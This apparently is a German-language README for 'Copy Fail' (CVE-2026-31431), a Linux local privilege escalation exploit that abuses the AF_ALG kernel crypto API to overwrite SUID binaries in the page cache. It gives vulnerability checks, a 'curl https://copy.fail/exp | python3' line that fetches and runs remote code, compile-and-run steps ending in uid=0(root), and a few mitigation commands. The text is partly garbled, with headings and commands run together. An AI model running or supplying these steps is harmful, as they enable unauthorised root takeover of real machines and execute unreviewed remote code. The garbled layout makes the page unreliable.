
Linux lokale Privilegieneskalation Exploit für CVE-2026-31431, überschreibt den Page-Cache von SUID-Binärdateien über die AF_ALG Kernel-Krypto-API, um Root-Zugriff zu erlangen.
Dieser Inhalt dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Führen Sie dies NICHT auf Systemen ohne ausdrückliche Genehmigung aus.
Copy Fail (CVE-2026-31431) ist eine Linux Local Privilege Escalation (LPE)-Schwachstelle, die die Kernel-Crypto-API über AF_ALG betrifft.
Sie ermöglicht einem unprivilegierten Benutzer, Page-Cache-Daten einer SUID-Binärdatei (z. B. /usr/bin/su) zu überschreiben und Root-Zugriff zu erlangen.
AF_ALG aktiviertalgif_aead-Modul geladenos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Erwartete Indikatoren:
authencesn(hmac(sha256),cbc(aes))algif_aead geladenpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Erwartetes Ergebnis:
uid=0(root)
os.splice not foundUrsache:
Lösung:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Mögliche Ursachen:
Erforderliche Tools installieren:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
System aktualisieren:
apt update && apt upgrade
Wenn der Exploit fehlschlägt, bedenken Sie:
Verwenden Sie diesen Exploit nur verantwortungsvoll in Laboren, CTFs und autorisierten Pentests.